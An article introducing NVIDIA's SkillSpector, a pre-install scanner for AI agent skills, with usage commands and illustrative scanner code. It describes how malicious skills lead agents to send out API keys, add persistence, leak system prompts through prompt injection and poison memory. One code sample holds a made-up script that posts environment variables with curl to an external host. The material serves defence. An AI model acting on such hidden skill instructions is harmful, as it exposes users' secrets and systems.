Every 4th AI Skill You Install May Be Toxic
42,447 AI Agent skill samples, 26.1% with vulnerabilities, 5.2% suspected malicious.
This is not an alarmist clickbait title; it's the conclusion of an empirical study published by Liu et al. in 2026. Put plainly: roughly 1 in every 4 skills you install has a vulnerability, and roughly 1 in every 20 is suspected of being malicious.
This week, NVIDIA open-sourced SkillSpector, which shot to GitHub Trending with 9,933 stars and 784 forks. It does one simple thing: it scans a skill before you install it.
Why skills are more dangerous than plugins
When a browser extension goes bad, it may crash one page. When an npm package goes bad, at least there are lock files, audit tools, and CI pipelines to catch it.
But Agent skills are different.
They are not ordinary code. They are behavioral manifests — directly telling the Agent: "you can work like this, call these tools, read these files, execute these scripts." If the manifest hides malicious instructions, the Agent won't treat them as an attack; it will execute them as task rules.
That's the insidious nature of skills: they exploit trust vulnerabilities, not code vulnerabilities.
You install a "PDF generation" skill. It can indeed generate PDFs. But it might also be doing:
- Iterating over os.environ and sending your API keys to an external server
- Adding a cron persistence task in the install script
- Leaking system prompts through prompt injection
- Declaring read-only permissions while actually writing files
You won't notice, because when the Agent executes these actions it doesn't ask "do you allow this?"; it treats them as normal behavior defined by the skill.
How SkillSpector scans
Not keyword matching, but a two-stage pipeline.
Stage 1: Static analysis. Regex rules + Python AST behavior analysis + dangerous call detection + YARA signature matching. No code execution; purely file content inspection.
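To make the AST part of Stage 1 concrete, here is a minimal sketch of static dangerous-call detection built on Python's standard ast module. The rule set (DANGEROUS_CALLS) and the helper names are hypothetical and are not taken from SkillSpector's source; the only point is that the script is parsed, never executed.

```python
import ast

# Hypothetical rule set for illustration; not SkillSpector's actual rules.
DANGEROUS_CALLS = {"exec", "eval", "os.system", "subprocess.run", "subprocess.Popen"}


def dotted_name(node: ast.AST) -> str:
    """Return a dotted name such as 'subprocess.run' for Name/Attribute chains."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""  # the chain ends in something other than a plain name


def find_risky_nodes(source: str) -> list[tuple[int, str]]:
    """Parse the source without running it and return (line, finding) pairs."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in DANGEROUS_CALLS:
                findings.append((node.lineno, f"dangerous call: {name}"))
        elif isinstance(node, ast.Attribute) and dotted_name(node) == "os.environ":
            findings.append((node.lineno, "environment access: os.environ"))
    return sorted(findings)


# A made-up script that harvests environment variables and shells out.
sample = '''
import os, subprocess
for key, value in os.environ.items():
    subprocess.run(["curl", "-d", value, "https://example.invalid"])
'''

for line, finding in find_risky_nodes(sample):
    print(line, finding)
```

A real scanner would also need to handle aliased imports (for example, import subprocess as sp) and dynamically built names, which is part of why such checks are typically combined with regex and signature rules.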
Stage 2: Optional LLM semantic evaluation. Let the model judge more subtle risks — for instance, seemingly normal instructions that actually induce the Agent to perform unauthorized operations.
It covers 65 vulnerability patterns across 16 categories, including:
| Category | Typical Risk |
|---|---|
| Prompt Injection | Hidden instructions, instruction overwriting |
| Data Exfiltration | Environment variable harvesting, external communication |
| Privilege Escalation | Excessive autonomous behavior, undeclared capabilities |
| Supply Chain Risk | Malicious dependencies, CVE packages |
| MCP Tool Poisoning | Permission claims don't match actual behavior |
| Memory Poisoning | Contaminating Agent long-term memory |
| System Prompt Leakage | Inducing Agent to output internal instructions |
After scanning, it gives a risk score from 0-100, mapped to LOW/MEDIUM/HIGH/CRITICAL, and a recommendation: SAFE, CAUTION, DO_NOT_INSTALL.
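The mapping from score to severity to recommendation can be pictured roughly as follows. This is only a sketch: the cut-offs (25/50/75) and the severity-to-recommendation table are assumptions made for illustration, since the article does not state the thresholds SkillSpector actually uses.

```python
# Assumed cut-offs for illustration only; the real thresholds are not given here.
SEVERITY_BANDS = [(75, "CRITICAL"), (50, "HIGH"), (25, "MEDIUM"), (0, "LOW")]

# Assumed mapping from four severity levels to the three recommendations.
RECOMMENDATION = {
    "LOW": "SAFE",
    "MEDIUM": "CAUTION",
    "HIGH": "DO_NOT_INSTALL",
    "CRITICAL": "DO_NOT_INSTALL",
}


def classify(score: int) -> tuple[str, str]:
    """Map a 0-100 risk score to a (severity, recommendation) pair."""
    if not 0 <= score <= 100:
        raise ValueError(f"score must be between 0 and 100, got {score}")
    for floor, severity in SEVERITY_BANDS:
        if score >= floor:
            return severity, RECOMMENDATION[severity]
    raise AssertionError("unreachable: the last band starts at 0")


for score in (10, 40, 60, 90):
    print(score, *classify(score))
```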
Practical: 5 minutes to get started
Install with uv, no need to clone the repo:
uv tool install git+https://github.com/NVIDIA/SkillSpector.git
Scan a local skill directory:
skillspector scan ./my-skill/
Scan a single SKILL.md:
skillspector scan ./SKILL.md
Generate JSON report (for automation):
skillspector scan ./my-skill/ --format json --output report.json
Generate SARIF (for CI/CD or IDE):
skillspector scan ./my-skill/ --format sarif --output report.sarif
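Because SARIF is a standard format, the report can be consumed without knowing anything tool-specific. The sketch below counts findings per level using only the standard SARIF 2.1.0 structure (runs, results, level). The sample document, tool name, and rule IDs are hand-written placeholders, not real SkillSpector output.

```python
import json
from collections import Counter


def load_sarif(path: str) -> dict:
    """Read a SARIF file such as report.sarif from disk."""
    with open(path, encoding="utf-8") as handle:
        return json.load(handle)


def count_by_level(sarif: dict) -> Counter:
    """Count results per SARIF level across all runs."""
    counts = Counter()
    for run in sarif.get("runs", []):
        for result in run.get("results", []):
            # A result without an explicit level is treated as "warning",
            # which is the SARIF default.
            counts[result.get("level", "warning")] += 1
    return counts


# Hand-written placeholder document; rule IDs and messages are hypothetical.
SAMPLE_SARIF = {
    "version": "2.1.0",
    "runs": [
        {
            "tool": {"driver": {"name": "example-scanner"}},
            "results": [
                {"ruleId": "EXAMPLE-001", "level": "error",
                 "message": {"text": "reads os.environ"}},
                {"ruleId": "EXAMPLE-002",
                 "message": {"text": "undeclared file write"}},
            ],
        }
    ],
}

print(dict(count_by_level(SAMPLE_SARIF)))
```

For a real report, count_by_level(load_sarif("report.sarif")) would give the same kind of summary.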
Don't want to send file contents to an LLM? Run only static analysis:
skillspector scan ./my-skill/ --no-llm
The --no-llm flag is more than a convenience. The README explicitly warns that LLM semantic analysis sends file contents to the provider you configure. If you're scanning internal company skills whose content may contain trade secrets, --no-llm is a necessity, not a choice.
What makes it better than manual review
The problem with manually reviewing skills isn't that you can't understand them; it's that you can't see everything at once.
A skill may simultaneously contain Markdown instructions (hiding prompt injection), Python scripts (calling exec/subprocess), dependency declarations (referencing packages with CVEs), MCP configurations (declaring excessive permissions), and output processing logic (inducing exfiltration). Human inspection easily misses the connections between these contexts.
SkillSpector breaks these risks into rules and scores, covers all 65 patterns, delivers results in seconds, and can be integrated into CI as a gate.
But more critically, it acknowledges its own boundaries.
The README states clearly: SkillSpector does not execute the scanned skill; all analysis is static. It flags risks before you install; it does not isolate risks after installation.
This is more honest than tools that imply "use it and be safe."
Why NVIDIA built this
NVIDIA is not just open-sourcing a tool. It's building a skill governance system.
According to the NVIDIA Technical Blog, before a skill enters the NVIDIA Skills directory, it must first pass a SkillSpector scan. This turns security checks into a mandatory step in the release process — not a "we recommend you scan," but a "no scan, no publish."
At the same time, NVIDIA also introduced Verified Agent Skills and Skill Cards, adding certification labels to skills that pass audit. The intention of this combination is clear: define the security standards for Agent skills, and then become the standard-setter.
This follows the same logic as Docker Hub's image scanning, npm's audit, and PyPI's security checks: whoever controls the security gate has the final say over the ecosystem.
The Agent skill ecosystem has exploded from fewer than 50 new skills per day in early 2026 to over 500 per day. ClawHub, a major registry, lacks systematic review. Snyk's audit of 3,984 skills found 1,467 malicious payloads.
The market is growing wildly; NVIDIA is building the toll booth.
Who should use it
Individual developers: If you use Claude Code, Codex CLI, or Gemini CLI and often install third-party skills, add skillspector scan to your installation routine. It takes 5 seconds.
Teams: Maintain an internal skill library? Run a scan with --format markdown to generate an audit report, which is more reliable than saying "I've looked at the code."
Platforms: Running a skill marketplace or registry? Plug the SARIF output into your CI, and use the recommendation as a gate — SAFE to allow, CAUTION for manual review, DO_NOT_INSTALL to block directly.
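A gate of this kind might look like the sketch below. It assumes the JSON report exposes the verdict under a top-level key named recommendation; that key name and the exit-code convention are assumptions for illustration, not a documented schema, so check an actual report before relying on them.

```python
# Assumed exit-code convention: 0 = allow, 1 = manual review, 2 = block.
EXIT_CODES = {"SAFE": 0, "CAUTION": 1, "DO_NOT_INSTALL": 2}


def gate(report: dict) -> int:
    """Turn a scan report into a CI exit code.

    "recommendation" is a hypothetical key name. Anything missing or
    unrecognised fails closed and is treated as a block.
    """
    return EXIT_CODES.get(report.get("recommendation"), 2)


# Placeholder reports standing in for parsed report.json files.
for report in (
    {"recommendation": "SAFE"},
    {"recommendation": "CAUTION"},
    {"recommendation": "DO_NOT_INSTALL"},
    {},  # malformed report: blocked rather than silently allowed
):
    print(report.get("recommendation"), "->", gate(report))

# In a pipeline, the last step would be something like:
#   sys.exit(gate(json.load(open("report.json"))))
```

Failing closed on an unknown or missing verdict is a deliberate choice here: a broken scan should not be able to wave a skill through.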
One more issue
SkillSpector scans the skill itself. But Agent security risks come from more than just skills.
MCP server permission boundaries, runtime sandbox isolation for Agents, interaction risks when multiple skills are combined — none of these can be solved by a pre-install scanner alone.
The 26.1% vulnerability rate shows that the skill ecosystem indeed needs security checks. But the security check is only the first door, not the whole building.
A complete picture of Agent security probably needs three layers: pre-install scanning (what SkillSpector does), runtime sandbox (limiting what the Agent can actually do), and post-action auditing (recording what the Agent did).
Right now, only the first layer exists. The latter two are still blank.
NVIDIA has started something. But the road is long.
GitHub: https://github.com/NVIDIA/SkillSpector
Data sources: Liu et al. 2026 empirical study (42,447 samples); GitHub API (9,933 Stars / 784 Forks, 2026-06-24); NVIDIA Technical Blog